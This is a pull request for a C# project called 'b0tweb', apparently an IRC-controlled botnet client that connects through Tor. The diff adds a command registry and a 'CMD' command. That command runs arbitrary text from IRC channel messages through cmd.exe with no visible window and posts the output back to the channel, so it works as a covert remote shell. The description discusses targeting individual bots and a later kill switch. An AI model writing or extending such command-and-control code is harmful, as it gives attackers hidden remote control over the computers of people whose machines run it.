### PR TITLE
CommandRegistry and a CMD Command

### DIFF
--- a/b0tweb/Commands/AbstractCommand.cs
+++ b/b0tweb/Commands/AbstractCommand.cs
@@ -22,14 +22,14 @@ namespace b0tweb.Commands
         /// </summary>
         /// <param name="ircMessage">The message received via IRC.</param>
         /// <returns></returns>
-        public void Execute(string ircMessage) {
+        public string Execute(string ircMessage) {
             string[] splitMessage = ircMessage.Split(' ');
             string[] commandArgs = new string[splitMessage.Length - 2];
 
             // first two strings in the message are assumed to be the bot name and the command name respectively
             Array.Copy(splitMessage, 2, commandArgs, 0, commandArgs.Length);
 
-            this.ExecuteCommand(commandArgs);
+            return this.ExecuteCommand(commandArgs);
         }
 
         /// <summary>
@@ -37,7 +37,7 @@ namespace b0tweb.Commands
         /// </summary>
         /// <param name="args">arguments that are passed on to the command</param>
         /// <returns></returns>
-        abstract protected void ExecuteCommand(string[] args);
+        abstract protected string ExecuteCommand(string[] args);
 
         /// <summary>
         /// Check if the command matches the requested action from the IRC message.

--- a/b0tweb/Commands/AbstractCommand.cs
+++ b/b0tweb/Commands/AbstractCommand.cs
@@ -18,12 +18,27 @@ namespace b0tweb.Commands
         abstract public string Command { get; }
 
         /// <summary>
-        /// Execute the command based on the message given.
+        /// Execute the command given the IRC message
         /// </summary>
         /// <param name="message">The message received via IRC.</param>
         /// <returns></returns>
-        abstract public string Execute(string message);
+        public void Execute(string message) {
+            string[] splitMessage = message.Split(' ');
+            string[] commandArgs = new string[splitMessage.Length - 2];
 
+            // first two strings in the message are assumed to be the bot name and the command name respectively
+            Array.Copy(splitMessage, 2, commandArgs, 0, commandArgs.Length);
+
+            this.ExecuteCommand(commandArgs);
+        }
+
+        /// <summary>
+        /// Execute the command given the arguments as an array
+        /// </summary>
+        /// <param name="args">arguments that are passed on to the command</param>
+        /// <returns></returns>
+        abstract protected void ExecuteCommand(string[] args);
+        
         /// <summary>
         /// Check if the command matches the requested action from the IRC message.
         /// </summary>
@@ -31,7 +46,7 @@ namespace b0tweb.Commands
         /// <returns>If the command matches the requested action from the IRC message.</returns>
         public bool Matches(string message)
         {
-            return message.IndexOf(message) == 1;
+            return message.IndexOf(this.Command) != -1;
         }
     }
 }

--- a/b0tweb/Commands/AbstractCommand.cs
+++ b/b0tweb/Commands/AbstractCommand.cs
@@ -46,7 +46,7 @@ namespace b0tweb.Commands
         /// <returns>If the command matches the requested action from the IRC message.</returns>
         public bool Matches(string ircMessage)
         {
-            return message.IndexOf(this.Command) != -1;
+            return ircMessage.IndexOf(this.Command) != -1;
         }
     }
 }

--- a/b0tweb/Commands/AbstractCommand.cs
+++ b/b0tweb/Commands/AbstractCommand.cs
@@ -20,10 +20,10 @@ namespace b0tweb.Commands
         /// <summary>
         /// Execute the command given the IRC message
         /// </summary>
-        /// <param name="message">The message received via IRC.</param>
+        /// <param name="ircMessage">The message received via IRC.</param>
         /// <returns></returns>
-        public void Execute(string message) {
-            string[] splitMessage = message.Split(' ');
+        public void Execute(string ircMessage) {
+            string[] splitMessage = ircMessage.Split(' ');
             string[] commandArgs = new string[splitMessage.Length - 2];
 
             // first two strings in the message are assumed to be the bot name and the command name respectively
@@ -38,13 +38,13 @@ namespace b0tweb.Commands
         /// <param name="args">arguments that are passed on to the command</param>
         /// <returns></returns>
         abstract protected void ExecuteCommand(string[] args);
-        
+
         /// <summary>
         /// Check if the command matches the requested action from the IRC message.
         /// </summary>
-        /// <param name="message">The message received via IRC.</param>
+        /// <param name="ircMessage">The message received via IRC.</param>
         /// <returns>If the command matches the requested action from the IRC message.</returns>
-        public bool Matches(string message)
+        public bool Matches(string ircMessage)
         {
             return message.IndexOf(this.Command) != -1;
         }

--- a/b0tweb/Commands/CMDCommand.cs
+++ b/b0tweb/Commands/CMDCommand.cs
@@ -1,0 +1,45 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace b0tweb.Commands
+{
+    class CMDCommand : AbstractCommand
+    {
+        public override string Command => "CMD";
+
+        protected override void ExecuteCommand(string[] args)
+        {
+            // see https://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
+
+            // create the ProcessStartInfo using "cmd" as the program to be run,
+            // and "/c " as the parameters.
+            // Incidentally, /c tells cmd that we want it to execute the command that follows,
+            // and then exit.
+            System.Diagnostics.ProcessStartInfo procStartInfo =
+                new System.Diagnostics.ProcessStartInfo("cmd", "/c " + String.Join(" ", args))
+                {
+                    // redirect the stdout to Process.StandardOutput StreamReader.
+                    RedirectStandardOutput = true,
+                    UseShellExecute = false,
+                    // Do not create the black window.
+                    CreateNoWindow = true
+                };
+
+            // Now we create a process, assign its ProcessStartInfo and start it
+            System.Diagnostics.Process proc = new System.Diagnostics.Process
+            {
+                StartInfo = procStartInfo
+            };
+
+            proc.Start();
+
+            // Get the output into a string
+            string result = proc.StandardOutput.ReadToEnd();
+
+            // Display the command output.
+            Console.Write(result); // TODO: Temporary. Need a way to nicely propogate results to irc
+        }
+    }
+}

--- a/b0tweb/Commands/CMDCommand.cs
+++ b/b0tweb/Commands/CMDCommand.cs
@@ -39,7 +39,7 @@ namespace b0tweb.Commands
             string result = proc.StandardOutput.ReadToEnd();
 
             // Display the command output.
-            return result; // TODO: Temporary. Need a way to nicely propogate results to irc
+            return result;
         }
     }
 }

--- a/b0tweb/Commands/CMDCommand.cs
+++ b/b0tweb/Commands/CMDCommand.cs
@@ -9,7 +9,7 @@ namespace b0tweb.Commands
     {
         public override string Command => "CMD";
 
-        protected override void ExecuteCommand(string[] args)
+        protected override string ExecuteCommand(string[] args)
         {
             // see https://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
 
@@ -39,7 +39,7 @@ namespace b0tweb.Commands
             string result = proc.StandardOutput.ReadToEnd();
 
             // Display the command output.
-            Console.Write(result); // TODO: Temporary. Need a way to nicely propogate results to irc
+            return result; // TODO: Temporary. Need a way to nicely propogate results to irc
         }
     }
 }

--- a/b0tweb/Commands/CommandRegistry.cs
+++ b/b0tweb/Commands/CommandRegistry.cs
@@ -1,0 +1,54 @@
+﻿using System;
+using System.Threading;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace b0tweb.Commands
+{
+    static class CommandRegistry
+    {
+        private static AbstractCommand[] _supportedCommands = { 
+            new CMDCommand(), 
+        };
+
+        /// <summary>
+        /// Tries to find a supported command given the irc message
+        /// </summary>
+        /// <param name="ircMessage">The message received via IRC.</param>
+        /// <returns>The command if it's supported, null otherwise</returns>
+        public static AbstractCommand Find(string ircMessage)
+        {
+            return Array.Find(_supportedCommands, command => command.Matches(ircMessage));
+        }
+
+        /// <summary>
+        /// If the ircMessage abides by the protocol and describes a supported command
+        /// that respective command will be executed asynchronously in a seperate thread.
+        /// </summary>
+        /// <param name="ircMessage">The message received via IRC.</param>
+        public static void ExecuteAsync(string ircMessage)
+        {
+            Thread executionThread = new Thread(() => ExecuteSync(ircMessage));
+
+            executionThread.Start();
+        }
+
+        /// <summary>
+        /// If the ircMessage abides by the protocol and describes a supported command
+        /// that respective command will be executed synchronously.
+        /// </summary>
+        /// <param name="ircMessage">The message received via IRC.</param>
+        public static void ExecuteSync(string ircMessage)
+        {
+            AbstractCommand matchingCommand = CommandRegistry.Find(ircMessage);
+
+            if (matchingCommand == null) // no command found
+            {
+                return;
+            }
+
+            matchingCommand.Execute(ircMessage);
+        }
+    }
+}

--- a/b0tweb/Commands/CommandRegistry.cs
+++ b/b0tweb/Commands/CommandRegistry.cs
@@ -39,16 +39,16 @@ namespace b0tweb.Commands
         /// that respective command will be executed synchronously.
         /// </summary>
         /// <param name="ircMessage">The message received via IRC.</param>
-        public static void ExecuteSync(string ircMessage)
+        public static string ExecuteSync(string ircMessage)
         {
             AbstractCommand matchingCommand = CommandRegistry.Find(ircMessage);
 
             if (matchingCommand == null) // no command found
             {
-                return;
+                return "Command not found!";
             }
 
-            matchingCommand.Execute(ircMessage);
+            return matchingCommand.Execute(ircMessage);
         }
     }
 }

--- a/b0tweb/IRCConnectionController.cs
+++ b/b0tweb/IRCConnectionController.cs
@@ -36,7 +36,7 @@ namespace b0tweb
         /// <summary>
         /// The proxy host port of the Tor proxy server.
         /// </summary>
-        private const int ProxyPort = 9150;
+        private const int ProxyPort = 9050;
 
         /// <summary>
         /// The proxy type of the Tor proxy server.

--- a/b0tweb/IRCConnectionController.cs
+++ b/b0tweb/IRCConnectionController.cs
@@ -2,6 +2,7 @@
 using System.Collections.Generic;
 using System.Linq;
 using System.Text;
+using b0tweb.MessageHandlers;
 using Meebey.SmartIrc4net;
 
 namespace b0tweb
@@ -35,7 +36,7 @@ namespace b0tweb
         /// <summary>
         /// The proxy host port of the Tor proxy server.
         /// </summary>
-        private const int ProxyPort = 9050;
+        private const int ProxyPort = 9150;
 
         /// <summary>
         /// The proxy type of the Tor proxy server.
@@ -93,9 +94,9 @@ namespace b0tweb
         /// Binds the <c>OnChannelMessage</c> event handler to the <c>callback</c> given.
         /// </summary>
         /// <param name="callback">The event handler to execute on a channel message receive.</param>
-        public void AddMessageHandler (IrcEventHandler callback)
+        public void AddMessageHandler (AbstractMessageHandler messageHandler)
         {
-            this._irc.OnChannelMessage += callback;
+            this._irc.OnChannelMessage += messageHandler.GetHandler(); ;
         }
 
         /// <summary>

--- a/b0tweb/MessageHandlers/AbstractMessageHandler.cs
+++ b/b0tweb/MessageHandlers/AbstractMessageHandler.cs
@@ -1,0 +1,32 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using Meebey.SmartIrc4net;
+
+namespace b0tweb.MessageHandlers
+{
+    /// <summary>
+    /// Class <c>AbstractMessageHandler</c> provides an abstraction over the IrcEventHandler
+    /// so that it would be easier to be implemented with our IRCConnectionController
+    /// </summary>
+    abstract class AbstractMessageHandler
+    {
+        private IrcEventHandler _eventHandler;
+
+        public AbstractMessageHandler ()
+        {
+            this._eventHandler = new IrcEventHandler(BuildHandler);
+        }
+
+        public IrcEventHandler GetHandler()
+        {
+            return this._eventHandler;
+        }
+
+        /// <summary>
+        /// The callback function to be executed during an IrcEvent
+        /// </summary>
+        protected abstract void BuildHandler(object sender, IrcEventArgs e);
+    }
+}

--- a/b0tweb/MessageHandlers/AbstractMessageHandler.cs
+++ b/b0tweb/MessageHandlers/AbstractMessageHandler.cs
@@ -12,13 +12,23 @@ namespace b0tweb.MessageHandlers
     /// </summary>
     abstract class AbstractMessageHandler
     {
+        /// <summary>
+        /// The irc event handler
+        /// </summary>
         private IrcEventHandler _eventHandler;
 
+        /// <summary>
+        /// Initializes the <c>IrcEventHandler</c> providing <see cref="BuildHandler"/> method as callback
+        /// </summary>
         public AbstractMessageHandler ()
         {
             this._eventHandler = new IrcEventHandler(BuildHandler);
         }
 
+        /// <summary>
+        /// Getter for the SmartIrc4Net <c>IrcEventHandler</c> defined by this message handler
+        /// </summary>
+        /// <returns>SmartIrc4Net handler defined by this Message Handler</returns>
         public IrcEventHandler GetHandler()
         {
             return this._eventHandler;

--- a/b0tweb/MessageHandlers/CommandMessageHandler.cs
+++ b/b0tweb/MessageHandlers/CommandMessageHandler.cs
@@ -11,7 +11,8 @@ namespace b0tweb.MessageHandlers
     {
         protected override void BuildHandler(object sender, IrcEventArgs e)
         {
-            CommandRegistry.ExecuteSync(e.Data.Message);
+            string response = CommandRegistry.ExecuteSync(e.Data.Message);
+            e.Data.Irc.SendMessage(SendType.Message, e.Data.Irc.JoinedChannels[0], response);
         }
     }
 }

--- a/b0tweb/MessageHandlers/CommandMessageHandler.cs
+++ b/b0tweb/MessageHandlers/CommandMessageHandler.cs
@@ -1,0 +1,17 @@
+﻿using Meebey.SmartIrc4net;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using b0tweb.Commands;
+
+namespace b0tweb.MessageHandlers
+{
+    class CommandMessageHandler : AbstractMessageHandler
+    {
+        protected override void BuildHandler(object sender, IrcEventArgs e)
+        {
+            CommandRegistry.ExecuteSync(e.Data.Message);
+        }
+    }
+}

--- a/b0tweb/Program.cs
+++ b/b0tweb/Program.cs
@@ -2,6 +2,7 @@
 using System.Collections.Generic;
 using System.Linq;
 using System.Text;
+using b0tweb.MessageHandlers;
 
 namespace b0tweb
 {
@@ -23,11 +24,16 @@ namespace b0tweb
             TorProxy proxy = new TorProxy();
             proxy.Establish();
 
+            Console.WriteLine("Connection to Tor successfuly established!");
+
             IRCConnectionController controller = new IRCConnectionController();
+
+            controller.AddMessageHandler(new CommandMessageHandler());
+
             controller.Join(Program.Channel);
             controller.Listen();
 
-            proxy.Disconnect();
+            //proxy.Disconnect();
         }
     }
 }

--- a/b0tweb/Program.cs
+++ b/b0tweb/Program.cs
@@ -33,7 +33,7 @@ namespace b0tweb
             controller.Join(Program.Channel);
             controller.Listen();
 
-            //proxy.Disconnect();
+            proxy.Disconnect();
         }
     }
 }

--- a/b0tweb/b0tweb.csproj
+++ b/b0tweb/b0tweb.csproj
@@ -48,6 +48,10 @@
   </ItemGroup>
   <ItemGroup>
     <Compile Include="Commands\AbstractCommand.cs" />
+    <Compile Include="Commands\CMDCommand.cs" />
+    <Compile Include="Commands\CommandRegistry.cs" />
+    <Compile Include="MessageHandlers\AbstractMessageHandler.cs" />
+    <Compile Include="MessageHandlers\CommandMessageHandler.cs" />
     <Compile Include="Program.cs" />
     <Compile Include="IRCConnectionController.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />


### PR DESCRIPTION
Solves #6 

Some placeholder abstractions (Command and IRCController) got adjust/improved because of some required functionality (like arguments).

CommandRegistry has the ability to execute commands synchronously or not. Discussion point: how to specify that through our protocol? Or is that even necessary.

currently for testing purposes I have left it to be synchronous.

Missing: 
- string check for whether the command is targeting the correct bot. (thinking that currently it's more annoying to test small things fast, can add it later)
- ability to send messages back to irc (this has not been discussed right now, but we could u know)

I decided to also add an `AbstractMessageHandler` since not only abstractions never really hurt, but I thought that we might want to separate some kill switch stuff from the command abstractions and thus we will need another message handler.